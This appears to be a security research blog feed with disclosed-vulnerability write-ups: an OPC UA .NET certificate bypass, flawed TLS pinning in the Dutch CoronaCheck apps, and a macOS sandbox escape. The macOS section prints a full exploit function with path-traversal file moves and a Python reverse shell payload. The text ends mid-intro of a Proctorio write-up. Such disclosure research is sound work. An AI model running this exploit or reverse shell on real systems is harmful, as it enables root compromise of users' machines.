With this vulnerability we could bypass the Trusted Application Check against the reference server that is included in the OPC UA .NET Standard repository. It would also be possible to bypass the check at the client side to impersonate a server.

In addition, OPC UA also has what is known as “User Authentication”, which happens after the Trusted Application Check to establish a session. One of the options for User Authentication is by using an X.509 certificate, which could be bypassed in the same way too.

In most places in practice the OPC UA server would not be exposed to the public internet, so to exploit this issue an attacker would need to already have access to an internal ICS network. However, in rare cases where exposing an OPC UA server to the public internet would be unavoidable, enabling certificate authentication would be the most effective method for securing it. In that case, this check could be bypassed and it would be possible to gain access to the communication.

Once connected to an OPC UA server, the attacker would be able to read and write data, which could be used to disrupt the ICS processes that use this server.

The fix

The issues we found were fixed in the commit 51549f5ed846c8ac060add509c76ff4c0470f24d and assigned CVE-2022-29865. Names are now compared in the same manner as other X.509 implementations, by not doing a case-insensitive check and no resorting of name components. In addition, defensive checks were added to make sure that the two certificate chains that are used are equal.


Certificate validation is tricky, as we have also demonstrated before in our post about the Dutch Corona-check app. These vulnerabilities actually bear some similarity, as both used a check for issuers based only on forgeable data. In this case, the cause is the desire to not use the Windows certificate store. We are unsure if this is truly the only way to implement this in .NET, as the CustomTrustStore property and TrustMode=CustomRootTrust setting on an X509ChainPolicy object appear to offer the required functionality without a dependence on the Windows certificate store.

The level of detail in the OPC UA specification regarding certificate validation is admirable. For example, it specifies clearly what errors should be used in what situations and there is even a chapter that suggests how to store the certificates on the server. However, there is a risk that over-specification of how a process like this should work leads to complex and non-idiomatic code. If the normal .NET API can no longer be applied directly as certain parts need to be re-implemented, this could create a large potential source for vulnerabilities.


We demonstrated a Trusted Application Check Bypass in OPC Foundation OPC UA .NET Standard. This can be used to set up a trusted connection to an OPC UA server. The cause of this vulnerability was the modification of the certificate validation procedure to use trusted roots stored in a custom location instead of the Windows certificate store and an unusual name comparison. This made it possible to made our certificate appear to be signed by one of the trusted roots.

We thank Zero Day Initiative for organizing this years edition of Pwn2Own Miami, we hope to return to a later edition!

You can find the other four write-ups here:

CoronaCheck App TLS certificate vulnerabilities

3 February 2022 at 00:00

During the pandemic a lot of software has seen an explosive growth of active users, such as the software used for working from home. In addition, completely new applications have been developed to track and handle the pandemic, like those for Bluetooth-based contact tracing. These projects have been a focus of our research recently. With projects growing this quickly or with a quick deadline for release, security is often not given the required attention. It is therefore very useful to contribute some research time to improve the security of the applications all of us suddenly depend on. Previously, we have found vulnerabilities in Zoom and Proctorio. This blog post will detail some vulnerabilities in the Dutch CoronaCheck app we found and reported. These vulnerabilities are related to the security of the connections used by the app and were difficult to exploit in practice. However, it is a little worrying to find this many vulnerabilities in an app for which security is of such critical importance.


The CoronaCheck app can be used to generate a QR code proving that the user has received either a COVID-19 vaccination, has recently received a negative test result or has recovered from COVID-19. A separate app, the CoronaCheck Verifier can be used to check these QR codes. These apps are used to give access to certain locations or events, which is known in The Netherlands as “Testen voor Toegang”. They may also be required for traveling to specific countries. The app used to generate the QR code is refered to in the codebase as the Holder app to distinguish it from the Verifier app. The source code of these apps is available on Github, although active development takes place in a separate non-public repository. At certain intervals, the public source code is updated from the private repository.

The Holder app:

The Verifier app:

The verification of the QR codes uses two different methods, depending on whether the code is for use in The Netherlands or internationally. The cryptographic process is very different for each. We spent a bit of time looking at these two processes, but found no (obvious) vulnerabilities.

Then we looked at the verification of the connections set up by the two apps. Part of the configuration of the app needs to be downloaded from a server hosted by the Ministerie van Volksgezondheid, Welzijn en Sport (VWS). This is because test results are retrieved by the app directly from the test provider. This means that the Holder app needs to know which test providers are used right now, how to connect to them and the Verifier app needs to know what keys to use to verify the signatures for that test provider. The privacy aspects of this design are quite good: the test provider only knows the user retrieved the result, but not where they are using it. VWS doesn’t know who has done a test or their results and the Verifier only sees the limited personal information in the QR which is needed to check the identity of the holder. The downside of this is that blocking a specific person’s QR code is difficult.

Strict requirements were formulated for the security of these connections in the design. See here (in Dutch). This includes the use of certificate pinning to check that the certificates are issued a small set of Certificate Authorities (CAs). In addition to the use of TLS, all responses from the APIs must be signed using a signature. This uses the PKCS#7 Cryptographic Message Syntax (CMS) format.

Many of the checks on certificates that were added in the iOS app contained subtle mistakes. Combined, only one implicit check on the certificate (performed by App Transport Security) was still effective. This meant that there was no certificate pinning at all and any malicious CA could generate a certificate capable of intercepting the connections between the app and VWS or a test provider.

Certificate check issues

An iOS app that wants to handle the checking of TLS certificates itself can do so by implementing the delegate method urlSession(_:didReceive:completionHandler:). Whenever a new connection is created, this method is called allowing the app to perform its own checks. It can respond in three different ways: continue with the usual validation (performDefaultHandling), accept the certificate (useCredential) or reject the certificate (cancelAuthenticationChallenge). This function can also be called for other authentication challenges, such as HTTP basic authentication, so it is common to check that the type is NSURLAuthenticationMethodServerTrust first.

This was implemented as follows in SecurityStrategy.swift lines 203 to 262:

203func checkSSL() {
205    guard challenge.protectionSpace.authenticationMethod == NSURLAuthenticationMethodServerTrust,
206          let serverTrust = challenge.protectionSpace.serverTrust else {
208        logDebug("No security strategy")
209        completionHandler(.performDefaultHandling, nil)
210        return
211    }
213    let policies = [SecPolicyCreateSSL(true, as CFString)]
214    SecTrustSetPolicies(serverTrust, policies as CFTypeRef)
215    let certificateCount = SecTrustGetCertificateCount(serverTrust)
217    var foundValidCertificate = false
218    var foundValidCommonNameEndsWithTrustedName = false
219    var foundValidFullyQualifiedDomainName = false
221    for index in 0 ..< certificateCount {
223        if let serverCertificate = SecTrustGetCertificateAtIndex(serverTrust, index) {
224            let serverCert = Certificate(certificate: serverCertificate)
226            if let name = serverCert.commonName {
227                if name.lowercased() == {
228                    foundValidFullyQualifiedDomainName = true
229                    logVerbose("Host matched CN \(name)")
230                }
231                for trustedName in trustedNames {
232                    if name.lowercased().hasSuffix(trustedName.lowercased()) {
233                        foundValidCommonNameEndsWithTrustedName = true
234                        logVerbose("Found a valid name \(name)")
235                    }
236                }
237            }
238            if let san = openssl.getSubjectAlternativeName(, !foundValidFullyQualifiedDomainName {
239                if compareSan(san, name: {
240                    foundValidFullyQualifiedDomainName = true
241                    logVerbose("Host matched SAN \(san)")
242                }
243            }
244            for trustedCertificate in trustedCertificates {
246                if, withTrustedCertificate: trustedCertificate) {
247                    logVerbose("Found a match with a trusted Certificate")
248                    foundValidCertificate = true
249                }
250            }
251        }
252    }
254    if foundValidCertificate && foundValidCommonNameEndsWithTrustedName && foundValidFullyQualifiedDomainName {
255        // all good
256        logVerbose("Certificate signature is good for \(")
257        completionHandler(.useCredential, URLCredential(trust: serverTrust))
258    } else {
259        logError("Invalid server trust")
260        completionHandler(.cancelAuthenticationChallenge, nil)
261    }

If an app wants to implement additional verification checks, then it is common to start with performing the platform’s own certificate validation. This also means that the certificate chain is resolved. The certificates received from the server may be incomplete or contain additional certificates, by applying the platform verification a chain is constructed ending in a trusted root (if possible). An app that uses a private root could also do this, but while adding the root as the only trust anchor.

This leads to the first issue with the handling of certificate validation in the CoronaCheck app: instead of giving the “continue with the usual validation” result, the app would accept the certificate if its own checks passed (line 257). This meant that the checks are not additions to the verification, but replace it completely. The app does implicitly perform the platform verification to obtain the correct chain (line 215), but the result code for the validation was not checked, so an untrusted certificate was not rejected here.

The app performs 3 additional checks on the certificate:

  • It is issued by one of a list of root certificates (line 246).
  • It contains a Subject Alternative Name containing a specific domain (line 238).
  • It contains a Common Name containing a specific domain (lines 227 and 232).

For checking the root certificate the resolved chain is used and each certificate is compared to a list of certificates hard-coded in the app. This set of roots depends on what type of connection it is. Connections to the test providers are a bit more lenient, while the connection to the VWS servers itself needs to be issued by a specific root.

This check had a critical issue: the comparison was not based on unforgeable data. Comparing certificates properly could be done by comparing them byte-by-byte. Certificates are not very large, this comparison would be fast enough. Another option would be to generate a hash of both certificates and compare those. This could speed up repeated checks for the same certificate. The implemented comparison of the root certificate was based on two checks: comparing the serial number and comparing the “authority key information” extension fields. For trusted certificates, the serial number must be randomly generated by the CA. The authority key information field is usually a hash of the certificate’s issuer’s key, but this can be any data. It is trivial to generate a self-signed certificate with the same serial number and authority key information field as an existing certificate. Combine this with the previous item and it is possible to generate a new, self-signed certificate that is accepted by the TLS verification of the app.

OpenSSL.m lines 144 to 227:

144- (BOOL)compare:(NSData *)certificateData withTrustedCertificate:(NSData *)trustedCertificateData {
146	BOOL subjectKeyMatches = [self compareSubjectKeyIdentifier:certificateData with:trustedCertificateData];
147	BOOL serialNumbersMatches = [self compareSerialNumber:certificateData with:trustedCertificateData];
148	return subjectKeyMatches && serialNumbersMatches;
151- (BOOL)compareSubjectKeyIdentifier:(NSData *)certificateData with:(NSData *)trustedCertificateData {
153	const ASN1_OCTET_STRING *trustedCertificateSubjectKeyIdentifier = NULL;
154	const ASN1_OCTET_STRING *certificateSubjectKeyIdentifier = NULL;
155	BIO *certificateBlob = NULL;
156	X509 *certificate = NULL;
157	BIO *trustedCertificateBlob = NULL;
158	X509 *trustedCertificate = NULL;
159	BOOL isMatch = NO;
161	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
162		EXITOUT("Cannot allocate certificateBlob");
164	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
165		EXITOUT("Cannot parse certificateData");
167	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
168		EXITOUT("Cannot allocate trustedCertificateBlob");
170	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
171		EXITOUT("Cannot parse trustedCertificate");
173	if (NULL == (trustedCertificateSubjectKeyIdentifier = X509_get0_subject_key_id(trustedCertificate)))
174		EXITOUT("Cannot extract trustedCertificateSubjectKeyIdentifier");
176	if (NULL == (certificateSubjectKeyIdentifier = X509_get0_subject_key_id(certificate)))
177		EXITOUT("Cannot extract certificateSubjectKeyIdentifier");
179	isMatch = ASN1_OCTET_STRING_cmp(trustedCertificateSubjectKeyIdentifier, certificateSubjectKeyIdentifier) == 0;
182	BIO_free(certificateBlob);
183	BIO_free(trustedCertificateBlob);
184	X509_free(certificate);
185	X509_free(trustedCertificate);
187	return isMatch;
190- (BOOL)compareSerialNumber:(NSData *)certificateData with:(NSData *)trustedCertificateData {
192	BIO *certificateBlob = NULL;
193	X509 *certificate = NULL;
194	BIO *trustedCertificateBlob = NULL;
195	X509 *trustedCertificate = NULL;
196	ASN1_INTEGER *certificateSerial = NULL;
197	ASN1_INTEGER *trustedCertificateSerial = NULL;
198	BOOL isMatch = NO;
200	if (NULL  == (certificateBlob = BIO_new_mem_buf(certificateData.bytes, (int)certificateData.length)))
201		EXITOUT("Cannot allocate certificateBlob");
203	if (NULL == (certificate = PEM_read_bio_X509(certificateBlob, NULL, 0, NULL)))
204		EXITOUT("Cannot parse certificate");
206	if (NULL  == (trustedCertificateBlob = BIO_new_mem_buf(trustedCertificateData.bytes, (int)trustedCertificateData.length)))
207		EXITOUT("Cannot allocate trustedCertificateBlob");
209	if (NULL == (trustedCertificate = PEM_read_bio_X509(trustedCertificateBlob, NULL, 0, NULL)))
210		EXITOUT("Cannot parse trustedCertificate");
212	if (NULL == (certificateSerial = X509_get_serialNumber(certificate)))
213		EXITOUT("Cannot parse certificateSerial");
215	if (NULL == (trustedCertificateSerial = X509_get_serialNumber(trustedCertificate)))
216		EXITOUT("Cannot parse trustedCertificateSerial");
218	isMatch = ASN1_INTEGER_cmp(certificateSerial, trustedCertificateSerial) == 0;
221	if (certificateBlob) BIO_free(certificateBlob);
222	if (trustedCertificateBlob) BIO_free(trustedCertificateBlob);
223	if (certificate) X509_free(certificate);
224	if (trustedCertificate) X509_free(trustedCertificate);
226	return isMatch;

This combination of issues may sound like TLS validation was completely broken, but luckily there was a safety net. In iOS 9, Apple introduced a mechanism called App Transport Security (ATS) to enforce certificate validation on connections. This is used to enforce the use of secure and trusted HTTPS connections. If an app wants to use an insecure connection (either plain HTTP or HTTPS with certificates not issued by a trusted root), it needs to specifically opt-in to that in its Info.plist file. This creates something of a safety net, making it harder to accidentally disable TLS certificate validation due to programming mistakes.

ATS was enabled for the CoronaCheck apps without any exceptions. This meant that our untrusted certificate, even though accepted by the app itself, was rejected by ATS. This meant we couldn’t completely bypass the certificate validation. This could however still be exploitable in these scenarios:

  • A future update for the app could add an ATS exception or an update to iOS might change the ATS rules. Adding an ATS exception is not as unrealistic as it may sound: the app contains a trusted root that is not included in the iOS trust store (“Staat der Nederlanden Private Root CA - G1”). To actually use that root would require an ATS exception.
  • A malicious CA could issue a certificate using the serial number and authority key information of one of the trusted certificates. This certificate would be accepted by ATS and pass all checks. A reliable CA would not issue such a certificate, but it does mean that the certificate pinning that was part of the requirements was not effective.

Other issues

We found a number of other issues in the verification of certificates. These are of lower impact.

Subject Alternative Names

In the past, the Common Name field was used to indicate for which domain a certificate was for. This was inflexible, because it meant each certificate was only valid for one domain. The Subject Alternative Name (SAN) extension was added to make it possible to add more domain names (or other types of names) to certificates. To correctly verify if a certificate is valid for a domain, the SAN extension has to be checked.

Obtaining the SANs from a certificates was implemented by using OpenSSL to generate a human-readable representation of the SAN extension and then parsing that. This did not take into account the possibility of other name types than a domain name, such as an email addresses in a certificate used for S/MIME. The parsing could be confused using specifically formatted email addresses to make it match any domain name.

SecurityStrategy.swift lines 114 to 127:

114func compareSan(_ san: String, name: String) -> Bool {
116    let sanNames = san.split(separator: ",")
117    for sanName in sanNames {
118        // SanName can be like DNS: *
119        let pattern = String(sanName)
120            .replacingOccurrences(of: "DNS:", with: "", options: .caseInsensitive)
121            .trimmingCharacters(in: .whitespacesAndNewlines)
122        if wildcardMatch(name, pattern: pattern) {
123            return true
124        }
125    }
126    return false

For example, an S/MIME certificate containing the email address "a,*,b" (which is a valid email address) would result in a wildcard domain (*) that matches all hosts.

CMS signatures

The domain name check for the certificate used to generate the CMS signature of the response did not compare the full domain name, instead it checked that a specific string occurred in the domain ( and that it ends with a specific string (.nl). This means that an attacker with a certificate for could also CMS sign API responses.

OpenSSL.m lines 259 to 278:

259- (BOOL)validateCommonNameForCertificate:(X509 *)certificate
260                         requiredContent:(NSString *)requiredContent
261                          requiredSuffix:(NSString *)requiredSuffix {
263    // Get subject from certificate
264    X509_NAME *certificateSubjectName = X509_get_subject_name(certificate);
266    // Get Common Name from certificate subject
267    char certificateCommonName[256];
268    X509_NAME_get_text_by_NID(certificateSubjectName, NID_commonName, certificateCommonName, 256);
269    NSString *cnString = [NSString stringWithUTF8String:certificateCommonName];
271    // Compare Common Name to required content and required suffix
272    BOOL containsRequiredContent = [cnString rangeOfString:requiredContent options:NSCaseInsensitiveSearch].location != NSNotFound;
273    BOOL hasCorrectSuffix = [cnString hasSuffix:requiredSuffix];
275    certificateSubjectName = NULL;
277    return hasCorrectSuffix && containsRequiredContent;

The only issue we found on the Android implementation is similar: the check for the CMS signature used a regex to check the name of the signing certificate. This regex was not bound on the right, making also possible to bypass it using

SignatureValidator.kt lines 94 to 96:

94fun cnMatching(substring: String): Builder {
95    return cnMatching(Regex(Regex.escape(substring)))

SignatureValidator.kt line 142 to 149:

if (cnMatchingRegex != null) {
    if (!JcaX509CertificateHolder(signingCertificate).subject.getRDNs(BCStyle.CN).any {
            val cn = IETFUtils.valueToString(it.first.value)
        }) {
        throw SignatureValidationException("Signing certificate does not match expected CN")

Because these certificates had to be issued by PKI-Overheid (a CA run by the Dutch government) certificate, it might not have been easy to obtain a certificate with such a domain name.

Race condition

We also found a race condition in the application of the certificate validation rules. As we mentioned, the rules the app applied for certificate validation were more strict for VWS connections than for connections to test providers, and even for connections to VWS there were different levels of strictness. However, if two requests were performed quickly after another, the first request could be validated based on the verification rules specified for the second request. In practice, the least strict verification rules still require a valid certificate, so this can not be used to intercept connections either. However, it was already triggering in normal use, as the app was initiating two requests with different validation rules immediately after starting.


We reported these vulnerabilities to the email address on the “Kwetsbaarheid melden” (Report a vulnerability) page on June 30th, 2021. This email bounced because the address did not exist. We had to reach out through other channels to find a working address. We received an acknowledgement that the message was received, but no further updates. The vulnerabilities were fixed quietly, without letting us know that they were fixed.

In October we decided to look at the code on GitHub to check if all issues were resolved correctly. While most issues were fixed, one was not fixed properly. We sent another email detailing this issue. This was again fixed without informing us.

Developers are of course not required to keep us in the loop of the if we report a vulnerability, but this does show that if they had, we could have caught the incorrect fix much earlier.


TLS certificate validation is a complex process. This case demonstrates that adding more checks is not always better, because they might interfere with the normal platform certificate validation. We recommend changing the certificate validation process only if absolutely necessary. Any extra checks should have a clear security goal. Checks such as “the domain must contain the string …” (instead of “must end with …”) have no security benefit and should be avoided.

Certificate pinning not only has implementation challenges, but also operational challenges. If a certificate renewal has not been properly planned, then it may leave an app unable to connect. This is why we usually recommend pinning only for applications handling very sensitive user data. Other checks can be implemented to address the risk of a malicious or compromised CA with much less chance of problems, for example checking the revocation and Certificate Transparency status of a certificate.


We found and reported a number of issues in the verification of TLS certificates used for the connections of the Dutch CoronaCheck apps. These vulnerabilities could have been combined to bypass certificate pinning in the app. In most cases, this could only be abused by a compromised or malicious CA or if a specific CA could be used to issue a certificate for a certain domain. These vulnerabilities have since then been fixed.

Sandbox escape + privilege escalation in StorePrivilegedTaskService

21 December 2021 at 00:00

CVE-2021-30688 is a vulnerability which was fixed in macOS 11.4 that allowed a malicious application to escape the Mac Application Sandbox and to escalate its privileges to root. This vulnerability required a strange exploitation path due to the sandbox profile of the affected service.


At rC3 in 2020 and HITB Amsterdam 2021 Daan Keuper and Thijs Alkemade gave a talk on macOS local security. One of the subjects of this talk was the use of privileged helper tools and the vulnerabilities commonly found in them. To summarize, many applications install a privileged helper tool in order to install updates for the application. This allows normal (non-admin) users to install updates, which is normally not allowed due to the permissions on /Applications. A privileged helper tool is a service which runs as root which used for only a specific task that needs root privileges. In this case, this could be installing a package file.

Many applications that use such a tool contain two vulnerabilities that in combination lead to privilege escalation:

  1. Not verifying if a request to install a package comes from the main application.
  2. Not correctly verifying the authenticity of an update package.

As it turns out, the first issue not only affects third-party developers, but even Apple itself! Although in a slightly different way…

About StorePrivilegedTaskService

StorePrivilegedTaskService is a tool used by the Mac App Store to perform certain privileged operations, such as removing the quarantine flag of downloaded files, moving files and adding App Store receipts. It is an XPC service embedded in the AppStoreDaemon.framework private framework.

To explain this vulnerability, it would be best to first explain XPC services and Mach services, and the difference between those two.

First of all, XPC is an inter-process communication technology developed by Apple which is used extensively to communicate between different processes in all of Apple’s operating systems. In iOS, XPC is a private API, usable only indirectly by APIs that need to communicate with other processes. On macOS, developers can use it directly. One of the main benefits of XPC is that it sends structured data, supporting many data types such as integers, strings, dictionaries and arrays. This can in many cases avoid the use of serialization functions, which reduces the possibility of vulnerabilities due to parser bugs.

XPC services

An XPC service is a lightweight process related to another application. These are launched automatically when an application initiates an XPC connection and terminated after they are no longer used. Communication with the main process happens (of course) over XPC. The main benefit of using XPC services is the ability to separate dangerous operations or privileges, because the XPC service can have different entitlements.

For example, suppose an application needs network functionality for only one feature: to download a fixed URL. This means that when sandboxing the application, it would need full network client access (i.e. the entitlement). A vulnerability in this application can then also use the network access to send out arbitrary network traffic. If the functionality for performing the request would be moved to a different XPC service, then only this service would need the network permission. Compromising the main application would only allow it to retrieve that URL and compromising the XPC service would be unlikely, as it requires very little code. This pattern is how Apple uses these services throughout the system.

These services can have one of 3 possible service types:

  • Application: each application initiating a connection to an XPC service spawns a new process (though multiple connections from one application are still handled in the same process).
  • User: per user only one instance of an XPC service is running, handling requests from all applications running as that user.
  • System: only one instance of the XPC service is running and it runs as root. Only available for Apple’s own XPC services.

Mach services

While XPC services are local to an application, Mach services are accessible for XPC connections system wide by registering a name. A common way to register this name is through a launch agent or launch daemon config file. This can launch the process on demand, but the process is not terminated automatically when no longer in use, like XPC services are.

For example, some of the mach services of lsd:



Connecting to an XPC service using the NSXPCConnection API:

[[NSXPCConnection alloc] initWithServiceName:serviceName];

while connecting to a mach service:

[[NSXPCConnection alloc] initWithMachServiceName:name options:options];

NSXPCConnection is a higher-level Objective-C API for XPC connections. When using it, an object with a list of methods can be made available to the other end of the connection. The connecting client can call these methods just like it would call any normal Objective-C methods. All serialization of objects as arguments is handled automatically.


XPC services in third-party applications rarely have interesting permissions to steal compared to a non-sandboxed application. Sanboxed services can have entitlements that create sandbox exceptions, for example to allow the service to access the network. Compared to a non-sandboxed application, these entitlements are not interesting to steal because the app is not sandboxed. TCC permissions are also usually set for the main application, not its XPC services (as that would generate rather confusing prompts for the end user).

A non-sandboxed application can therefore almost never gain anything by connecting to the XPC service of another application. The template for creating a new XPC service in Xcode does not even include a check on which application has connected!

This does, however, appear to give developers a false sense of security because they often do not add a permission check to Mach services either. This leads to the privileged helper tool vulnerabilities discussed in our talk. For Mach services running as root, a check on which application has connected is very important. Otherwise, any application could connect to the Mach service to request it to perform its operations.

StorePrivilegedTaskService vulnerability

Sandbox escape

The main vulnerability in the StorePrivilegedTaskService XPC service was that it did not check the application initiating the connection. This service has a service type of System, so it would launch as root.

This vulnerability was exploitable due to defense-in-depth measures which were ineffective:

  • StorePrivilegedTaskService is sandboxed, but its custom sandboxing profile is not restrictive enough.
  • For some operations, the service checked the paths passed as arguments to ensure they are a subdirectory of a specific directory. These checks could be bypassed using path traversal.

This XPC service is embedded in a framework. This means that even a sandboxed application could connect to the XPC service, by loading the framework and then connecting to the service.

[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@""];

The XPC service offers a number of interesting methods that can be called from the application using an NSXPCConnection. For example:

// Write a file
- (void)writeAssetPackMetadata:(NSData *)metadata toURL:(NSURL *)url withReplyHandler:(void (^)(NSError *))replyHandler;
 // Delete an item
- (void)removePlaceholderAtPath:(NSString *)path withReplyHandler:(void (^)(NSError *))replyHandler;
// Change extended attributes for a path
- (void)setExtendedAttributeAtPath:(NSString *)path name:(NSString *)name value:(NSData *)value withReplyHandler:(void (^)(NSError *))replyHandler;
// Move an item
- (void)moveAssetPackAtPath:(NSString *)path toPath:(NSString *)toPath withReplyHandler:(void (^)(NSError *))replyHandler;

A sandbox escape was quite clear: write a new application bundle, use the method -setExtendedAttributeAtPath:name:value:withReplyHandler: to remove its quarantine flag and then launch it. However, this also needs to take into account the sandbox profile of the XPC service.

The service has a custom profile. The restriction related to files and folders are:

(allow file-read* file-write*
        (vnode-type DIRECTORY)
            (literal "/Library/Application Support/App Store")
            (regex #"\.app(download)?(/Contents)?")
            (regex #"\.app(download)?/Contents/_MASReceipt(\.sb-[a-zA-Z0-9-]+)?")))
        (vnode-type REGULAR-FILE)
            (literal "/Library/Application Support/App Store/adoption.plist")
            (literal "/Library/Preferences/")
            (regex #"\.appdownload/Contents/placeholderinfo")
            (regex #"\.appdownload/Icon")
            (regex #"\.app(download)?/Contents/_MASReceipt((\.sb-[a-zA-Z0-9-]+)?/receipt(\.saved)?)"))) ;covers temporary files the receipt may be named

    (subpath "/System/Library/Caches/")
    (subpath "/System/Library/Caches/OnDemandResources")

The intent of these rules is that this service can modify specific files in applications currently downloading from the app store, so with a .appdownload extension. For example, adding a MASReceipt file and changing the icon.

The regexes here are the most interesting, mainly because they are attached neither on the left nor right. On the left this makes sense, as the full path could be unknown, but the lack of binding it on the right (with $) is a mistake for the file regexes.

Formulated simply, we can do the following with this sandboxing profile:

  • All operations are allowed on directories containing .app anywhere in their path.
  • All operations are allowed on files containing .appdownload/Icon anywhere in their path.

By creating a specific directory structure in the temporary files directory of our sandboxed application:


Both the sandboxed application and the StorePrivilegedTaskService have full access inside the Icon folder. Therefore, it would be possible to create a new application here and then use -setExtendedAttributeAtPath:name:value:withReplyHandler: on the executable to dequarantine it.


This was already a nice vulnerability, but we were convinced we could escalate privileges to root as well. Having a process running as root creating new files in chosen directories with specific contents is such a powerful primitive that privilege escalation should be possible. However, the sandbox requirements on the paths made this difficult.

Creating a new launch daemon or cron jobs are common ways for privilege escalation by file creation, but the sandbox profile path requirements would only allow a subdirectory of a subdirectory of the directories for these config files, so this did not work.

An option that would work would be to modify an application. In particular, we found that Microsoft Teams would work. Teams is one of the applications that installs a launch daemon for installing updates. However, instead of copying a binary to /Library/PrivilegedHelperTools, the daemon points into the application bundle itself:


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "">
<plist version="1.0">

The following would work for privilege escalation:

  1. Ask StorePrivilegedTaskService to move /Applications/Microsoft somewhere else. Allowed, because the path of the directory contains .app.1
  2. Move a new app bundle to /Applications/Microsoft, which contains a malicious executable file at Contents/TeamsUpdaterDaemon.xpc/Contents/MacOS/TeamsUpdaterDaemon.
  3. Connect to the Mach service.

However, a privilege escalation requiring a specific third-party application to be installed is not as convincing as a privilege escalation without this requirement, so we kept looking. The requirements are somewhat contradictory: typically anything bundled into an .app bundle runs as a normal user, not as root. In addition, the Signed System Volume on macOS Big Sur means changing any of the built-in applications is also impossible.

By an impressive and ironic coincidence, there is an application which is installed on a new macOS installation, not on the SSV and which runs automatically as root:, the “Malware Removal Tool”. Apple has implemented a number of anti-malware mechanisms in macOS. These are all updateable without performing a full system upgrade because they might be needed quickly. This means in particular that is not on the SSV. Most malware is removed by signature or hash checks for malicious content, MRT is the more heavy-handed solution when Apple needs to add code for performing the removal.

Although is in an app bundle, it is not in fact a real application. At boot, MRT is run as root to check if any malware needs removing.

Our complete attack follows the following steps, from sandboxed application to code execution as root:

  1. Create a new application bundle bar.appdownload/Icon/ in the temporary directory of our sandboxed application containing a malicious executable.
  2. Load the AppStoreDaemon.framework framework and connect to the StorePrivilegedTaskService XPC service.
  3. Ask StorePrivilegedTaskService to change the quarantine attribute for the executable file to allow it to launch without a prompt.
  4. Ask StorePrivilegedTaskService to move /Library/Apple/System/Library/CoreServices/ to a different location.
  5. Ask StorePrivilegedTaskService to move bar.appdownload/Icon/ from the temporary directory to /Library/Apple/System/Library/CoreServices/
  6. Wait for a reboot.

See the full function here:

/// The bar.appdownload/Icon part in the path is needed to create files where both the sandbox profile of StorePrivilegedTaskService and the Mac AppStore sandbox of this process allow acccess.
NSString *path = [NSTemporaryDirectory() stringByAppendingPathComponent:@"bar.appdownload/Icon/"];
NSFileManager *fm = [NSFileManager defaultManager];
NSError *error = nil;

/// Cleanup, if needed.
[fm removeItemAtPath:path error:nil];

[fm createDirectoryAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS"] withIntermediateDirectories:TRUE attributes:nil error:&error];


/// Create the payload. This example uses a Python reverse shell to
[@"#!/usr/bin/env python\n\nimport socket,subprocess,os; s=socket.socket(socket.AF_INET,socket.SOCK_STREAM); s.connect((\"\",1337)); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);[\"/bin/sh\",\"-i\"]);" writeToFile:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] atomically:TRUE encoding:NSUTF8StringEncoding error:&error];


/// Make the payload executable
[fm setAttributes:@{NSFilePosixPermissions: [NSNumber numberWithShort:0777]} ofItemAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] error:&error];


/// Load the framework, so the XPC service can be resolved.
[[NSBundle bundleWithPath:@"/System/Library/PrivateFrameworks/AppStoreDaemon.framework/"] load];

NSXPCConnection *conn = [[NSXPCConnection alloc] initWithServiceName:@""];
conn.remoteObjectInterface = [NSXPCInterface interfaceWithProtocol:@protocol(StorePrivilegedTaskInterface)];
[conn resume];

/// The new file is now quarantined, because this process created it. Change the quarantine flag to something which is allowed to run.
/// Another option would have been to use the `-writeAssetPackMetadata:toURL:replyHandler` method to create an unquarantined file.
[conn.remoteObjectProxy setExtendedAttributeAtPath:[path stringByAppendingPathComponent:@"Contents/MacOS/MRT"] name:@"" value:[@"00C3;60018532;Safari;" dataUsingEncoding:NSUTF8StringEncoding] withReplyHandler:^(NSError *result) {
    NSLog(@"%@", result);

    assert(result == nil);

    srand((unsigned int)time(NULL));

    /// Deleting this directory is not allowed by the sandbox profile of StorePrivilegedTaskService: it can't modify the files inside it.
    /// However, to move a directory, the permissions on the contents do not matter.
    /// It is moved to a randomly named directory, because the service refuses if it already exists.
    [conn.remoteObjectProxy moveAssetPackAtPath:@"/Library/Apple/System/Library/CoreServices/" toPath:[NSString stringWithFormat:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/", rand()]
                               withReplyHandler:^(NSError *result) {
        NSLog(@"Result: %@", result);

        assert(result == nil);

        /// Move the malicious directory in place of
        [conn.remoteObjectProxy moveAssetPackAtPath:path toPath:@"/System/Library/Caches/OnDemandResources/AssetPacks/../../../../../../../../../../../Library/Apple/System/Library/CoreServices/" withReplyHandler:^(NSError *result) {
            NSLog(@"Result: %@", result);

            /// At launch, /Library/Apple/System/Library/CoreServices/ -d is started. So now time to wait for that...


Apple has pushed out a fix in the macOS 11.4 release. They implemented all 3 of the recommended changes:

  1. Check the entitlements of the process initiating the connection to StorePrivilegedTaskService.
  2. Tightened the sandboxing profile of StorePrivilegedTaskService.
  3. The path traversal vulnerabilities for the subdirectory check were fixed.

This means that the vulnerability is not just fixed, but reintroducing it later is unlikely to be exploitable again due to the improved sandboxing profile and path checks. We reported this vulnerability to Apple on January 19th, 2021 and a fix was released on May 24th, 2021.

  1. This is actually a quite interesting aspect of the macOS sandbox: to delete a directory, the process needs to have file-write-unlink permission on all of the contents, as each file in it must be deleted. To move a directory somewhere else, only permissions on the directory itself and its destination are needed! ↩︎

Proctorio Chrome extension Universal Cross-Site Scripting

14 December 2021 at 00:00

The switch to online exams

In February of 2020 the first person in The Netherlands tested positive for COVID-19, which quickly led to a national lockdown. After that universities had to close for physical lectures. This meant that universities quickly had to switch to both online lectures and tests.

